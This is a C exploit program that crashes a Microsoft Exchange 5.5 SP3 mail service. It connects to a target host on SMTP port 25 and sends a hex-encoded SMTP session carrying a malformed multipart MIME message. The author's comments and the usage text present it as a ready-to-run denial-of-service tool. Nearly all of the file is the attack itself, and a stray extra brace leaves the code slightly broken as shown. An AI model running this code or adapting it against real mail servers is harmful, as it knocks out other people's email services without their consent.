/*
     *
     * TESSA: The Exchange Simple Service Assimilator
     * ----------------------------------------------
     *
     * This will crash a 'Microsoft Exchange 5.5 SP3 Internet Mail Service
     * and Information Store' (what's in a name)
     *
     * For people who got a little brains.. translate the shellcode, it will become
     * more clear for you.
     *
     * by incubus <incubus@securax.org>   http://securax.org/incubus
     *
     * All my love: Tessa.
     * Respect: #securax@efnet, mr_magnet, axess, f0bic, lamagra and steven.
     *
     */
     
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define SMTP_PORT   25
int main(int argc, char **argv){
  
  int i, sock, result;
    unsigned int port;
    struct sockaddr_in   name;
    struct hostent   *hostinfo;
  
    char buf[384] = "\x48\x45\x4c\x4f\x0d\x0a\x4d\x41\x49\x4c\x20\x46\x53\x4f\x4d\x3a"
                    "\x20\x72\x6f\x6f\x74\x40\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e"
                    "\x63\x6f\x6d\x0d\x0a\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x61\x64"
                    "\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x0d\x0a\x44\x41\x54"
                    "\x41\x0d\x0a\x0d\x0a\x4d\x49\x4d\x45\x2d\x56\x65\x72\x73\x69\x6f"
                    "\x6e\x3a\x20\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
                    "\x54\x79\x70\x65\x3a\x20\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f"
                    "\x61\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\x65\x3b\x0d\x0a\x0d\x0a"
                    "\x20\x20\x20\x20\x20\x20\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22"
                    "\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d\x4b\x54"
                    "\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x22\x0d\x0a\x0d\x0a\x20"
                    "\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61\x72\x79\x20\x31\x2d"
                    "\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48\x6b\x0d\x0a\x0d\x0a"
                    "\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74"
                    "\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x0d\x0a\x0d\x0a\x20\x20"
                    "\x20\x20\x20\x20\x20\x20\x20\x63\x68\x61\x72\x73\x65\x74\x20\x3d"
                    "\x20\x22\x22\x0d\x0a\x0d\x0a\x20\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
                    "\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e"
                    "\x67\x3a\x20\x37\x62\x69\x74\x0d\x0a\x0d\x0a\x20\x54\x68\x69\x73"
                    "\x20\x6d\x65\x73\x73\x61\x67\x65\x20\x69\x73\x20\x74\x65\x73\x74"
                    "\x0d\x0a\x0d\x0a\x20\x2d\x2d\x3d\x5f\x20\x42\x6f\x75\x6e\x64\x61"
                    "\x72\x79\x20\x31\x2d\x4b\x54\x77\x45\x76\x34\x6a\x59\x38\x34\x48"
                    "\x6b\x2d\x2d\x0d\x0a\x20\x0d\x0a\x20\x2e\x0d\x0a\x20\x0d\x0a\x20"
                    "\x0d\x0a\x51\x55\x49\x54"; /* phew.. */
                    
    
    if (argc < 2){
    fprintf (stdout, "Microsoft Exchange 5.5 SP3 Denial of Service\n--------------------------------------------\n");
    fprintf (stdout, "You better do %s <ipaddress or hostname> <port>\n", argv[0]);
    fprintf (stdout, "by incubus <incubus@securax.org>\n\n");
    exit(0);
  }
    if (argc < 3) port = SMTP_PORT;
    else port = atoi(argv[2]);
  hostinfo=gethostbyname(argv[1]);
  if (!hostinfo){
    herror("Damn!"); exit(-1);
/* SecuriTeam.com */
    }
  name.sin_family=AF_INET;
  name.sin_port=htons(port);
  name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
  sock=socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0)    { herror("Damn!"); exit(-1); } 
  result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
  if (result != 0) { herror("Damn!"); exit(-1); }
  send(sock, buf, sizeof(buf), 0);
  fprintf (stdout, "Done\n");
    close(sock);
  }
}